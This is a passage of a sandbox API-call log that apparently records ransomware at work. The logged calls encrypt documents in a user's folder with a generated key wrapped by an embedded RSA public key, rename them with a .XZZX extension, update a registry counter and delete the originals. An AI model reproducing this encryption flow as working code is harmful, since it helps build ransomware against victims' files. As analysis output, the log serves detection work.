lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0041.025] lstrcpyW (in: lpString1=0x46cf460, lpString2="8uRJm.csv" | out: lpString1="8uRJm.csv") returned="8uRJm.csv" [0041.025] lstrcpyW (in: lpString1=0x46ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0041.025] SetErrorMode (uMode=0x1) returned 0x1 [0041.025] lstrcpyW (in: lpString1=0x46cf860, lpString2="8uRJm.csv" | out: lpString1="8uRJm.csv") returned="8uRJm.csv" [0041.025] CoCreateGuid (in: pguid=0x46ce440 | out: pguid=0x46ce440*(Data1=0x8ed0a1a1, Data2=0x4ec6, Data3=0x416f, Data4=([0]=0xbf, [1]=0x7b, [2]=0xaf, [3]=0xb9, [4]=0xf9, [5]=0x37, [6]=0x23, [7]=0x42))) returned 0x0 [0041.025] wsprintfW (in: param_1=0x46cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\8uRJm.csv") returned 90 [0041.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x46cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0041.025] wsprintfW (in: param_1=0x46ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\069C108614226DDA8ED0A1A1188F5222.XZZX") returned 118 [0041.025] StrStrW (lpFirst="8uRJm.csv", lpSrch="XZZX") returned 0x0 [0041.025] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\8uRJm.csv", dwFileAttributes=0x20) returned 1 [0041.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\8uRJm.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\8urjm.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4bc [0041.026] ReadFile (in: hFile=0x4bc, lpBuffer=0x42fece0, nNumberOfBytesToRead=0xe97f, lpNumberOfBytesRead=0x46ce418, lpOverlapped=0x0 | out: lpBuffer=0x42fece0*, lpNumberOfBytesRead=0x46ce418*=0xe97f, lpOverlapped=0x0) returned 1 [0041.027] CloseHandle (hObject=0x4bc) returned 1 [0041.027] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3eb0000 [0041.027] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ec0000 [0041.028] SetErrorMode (uMode=0x1) returned 0x1 [0041.028] lstrcpyW (in: lpString1=0x46ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0041.028] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2e528) returned 1 [0041.031] CryptGenKey (in: hProv=0x3e2e528, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5490) returned 1 [0041.284] CryptExportKey (in: hKey=0x42e5490, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x46ce41c | out: pbData=0x0*, pdwDataLen=0x46ce41c*=0x94) returned 1 [0041.284] CryptExportKey (in: hKey=0x42e5490, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ec0000, pdwDataLen=0x46ce41c | out: pbData=0x3ec0000*, pdwDataLen=0x46ce41c*=0x94) returned 1 [0041.284] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0041.285] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0041.285] CryptDestroyKey (hKey=0x42e5490) returned 1 [0041.285] CryptReleaseContext (hProv=0x3e2e6c0, dwFlags=0x0) returned 0 [0041.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\069C108614226DDA8ED0A1A1188F5222.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\069c108614226dda8ed0a1a1188f5222.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0041.285] WriteFile (in: hFile=0x4a4, lpBuffer=0x42fece0*, nNumberOfBytesToWrite=0xe97f, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x42fece0*, lpNumberOfBytesWritten=0x46ce438*=0xe97f, lpOverlapped=0x0) returned 1 [0041.286] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe97f [0041.286] WriteFile (in: hFile=0x4a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0041.286] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe984 [0041.287] WriteFile (in: hFile=0x4a4, lpBuffer=0x46cf860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x46cf860*, lpNumberOfBytesWritten=0x46ce438*=0x12, lpOverlapped=0x0) returned 1 [0041.287] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe996 [0041.287] WriteFile (in: hFile=0x4a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0041.287] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe99b [0041.287] SetErrorMode (uMode=0x1) returned 0x1 [0041.287] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0041.287] OutputDebugStringW (lpOutputString="end") [0041.287] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wh\x9eâ\x03`Õl\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x46cdbf4, pcbBinary=0x46cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x46cdbf4, pcbBinary=0x46cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0041.287] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x46cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x46cd3dc, pcbStructInfo=0x46cd3d8 | out: pvStructInfo=0x46cd3dc, pcbStructInfo=0x46cd3d8) returned 1 [0041.287] CryptAcquireContextW (in: phProv=0x46cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x46cd3e4*=0x3e2e748) returned 1 [0041.288] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2e748, dwCertEncodingType=0x1, pInfo=0x3e3efb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3efe0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3efe8*, PublicKey.cUnusedBits=0x0), phKey=0x46cd3ec | out: phKey=0x46cd3ec*=0x42e5490) returned 1 [0041.288] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0041.288] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0041.288] CryptEncrypt (in: hKey=0x42e5490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x46cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x46cd3f0*=0x80) returned 1 [0041.288] CryptEncrypt (in: hKey=0x42e5490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2e7d0*, pdwDataLen=0x46cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2e7d0*, pdwDataLen=0x46cd3e8*=0x80) returned 1 [0041.288] WriteFile (in: hFile=0x4a4, lpBuffer=0x3e2e7d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e2e7d0*, lpNumberOfBytesWritten=0x46ce438*=0x80, lpOverlapped=0x0) returned 1 [0041.288] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0041.288] WriteFile (in: hFile=0x4a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0041.288] GetUserNameW (in: lpBuffer=0x46ce1f8, pcbBuffer=0x46cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x46cdfe0) returned 1 [0041.289] wsprintfW (in: param_1=0x46cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0041.289] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x46cdfe4 | out: phkResult=0x46cdfe4*=0x4b8) returned 0x0 [0041.289] RegQueryValueExW (in: hKey=0x4b8, lpValueName="E1010314", lpReserved=0x0, lpType=0x46cdfd8, lpData=0x46cdfec, lpcbData=0x46cdfdc*=0x4 | out: lpType=0x46cdfd8*=0x4, lpData=0x46cdfec*=0x28, lpcbData=0x46cdfdc*=0x4) returned 0x0 [0041.289] RegCloseKey (hKey=0x4b8) returned 0x0 [0041.289] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x46cdfe8 | out: phkResult=0x46cdfe8*=0x4b8) returned 0x0 [0041.289] RegSetValueExW (in: hKey=0x4b8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x46cdfec*=0x29, cbData=0x4 | out: lpData=0x46cdfec*=0x29) returned 0x0 [0041.289] RegCloseKey (hKey=0x4b8) returned 0x0 [0041.289] VirtualFree (lpAddress=0x3eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.289] VirtualFree (lpAddress=0x3ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.290] CloseHandle (hObject=0x4a4) returned 1 [0041.291] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0041.291] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0041.291] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\8uRJm.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\8urjm.csv")) returned 1 [0041.292] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\8uRJm.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\8urjm.csv")) returned 0 Thread: id = 135 os_tid = 0x8e8 [0041.227] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0041.227] lstrcpyW (in: lpString1=0x42cf460, lpString2="dUnN.ppt" | out: lpString1="dUnN.ppt") returned="dUnN.ppt" [0041.227] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0041.227] SetErrorMode (uMode=0x1) returned 0x1 [0041.227] lstrcpyW (in: lpString1=0x42cf860, lpString2="dUnN.ppt" | out: lpString1="dUnN.ppt") returned="dUnN.ppt" [0041.227] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0xceb95d75, Data2=0xa1af, Data3=0x4068, Data4=([0]=0xa7, [1]=0x2f, [2]=0x65, [3]=0x85, [4]=0xcb, [5]=0x93, [6]=0x62, [7]=0x4))) returned 0x0 [0041.227] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\dUnN.ppt") returned 89 [0041.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0041.227] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\E47D77FB28AD6F18CEB95D752CDA5360.XZZX") returned 118 [0041.227] StrStrW (lpFirst="dUnN.ppt", lpSrch="XZZX") returned 0x0 [0041.227] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\dUnN.ppt", dwFileAttributes=0x20) returned 1 [0041.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\dUnN.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\dunn.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0041.228] ReadFile (in: hFile=0x4a4, lpBuffer=0x42e5eb8, nNumberOfBytesToRead=0x16948, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesRead=0x42ce418*=0x16948, lpOverlapped=0x0) returned 1 [0041.228] CloseHandle (hObject=0x4a4) returned 1 [0041.229] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0041.229] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0041.229] SetErrorMode (uMode=0x1) returned 0x1 [0041.229] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0041.229] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2e6c0) returned 1 [0041.232] CryptGenKey (in: hProv=0x3e2e6c0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e54d0) returned 1 [0041.362] CryptExportKey (in: hKey=0x42e54d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0041.362] CryptExportKey (in: hKey=0x42e54d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x42ce41c | out: pbData=0x3e60000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0041.362] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0041.363] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0041.363] CryptDestroyKey (hKey=0x42e54d0) returned 1 [0041.363] CryptReleaseContext (hProv=0x3e2e6c0, dwFlags=0x0) returned 0 [0041.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\E47D77FB28AD6F18CEB95D752CDA5360.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\e47d77fb28ad6f18ceb95d752cda5360.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c4 [0041.364] WriteFile (in: hFile=0x4c4, lpBuffer=0x42e5eb8*, nNumberOfBytesToWrite=0x16948, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesWritten=0x42ce438*=0x16948, lpOverlapped=0x0) returned 1 [0041.365] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x16948 [0041.365] WriteFile (in: hFile=0x4c4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0041.365] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1694d [0041.365] WriteFile (in: hFile=0x4c4, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x10, lpOverlapped=0x0) returned 1 [0041.366] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1695d [0041.366] WriteFile (in: hFile=0x4c4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0041.366] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x16962 [0041.366] SetErrorMode (uMode=0x1) returned 0x1 [0041.366] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0041.366] OutputDebugStringW (lpOutputString="end") [0041.366] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0041.366] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0041.366] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3e2e858) returned 1 [0041.367] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2e858, dwCertEncodingType=0x1, pInfo=0x3e3eee0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3ef10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3ef18*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x42e54d0) returned 1 [0041.367] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0041.368] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0041.368] CryptEncrypt (in: hKey=0x42e54d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0041.368] CryptEncrypt (in: hKey=0x42e54d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2e8e0*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2e8e0*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0041.368] WriteFile (in: hFile=0x4c4, lpBuffer=0x3e2e8e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e2e8e0*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0041.368] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0041.368] WriteFile (in: hFile=0x4c4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0041.368] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0041.368] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0041.368] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x4a4) returned 0x0 [0041.369] RegQueryValueExW (in: hKey=0x4a4, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, 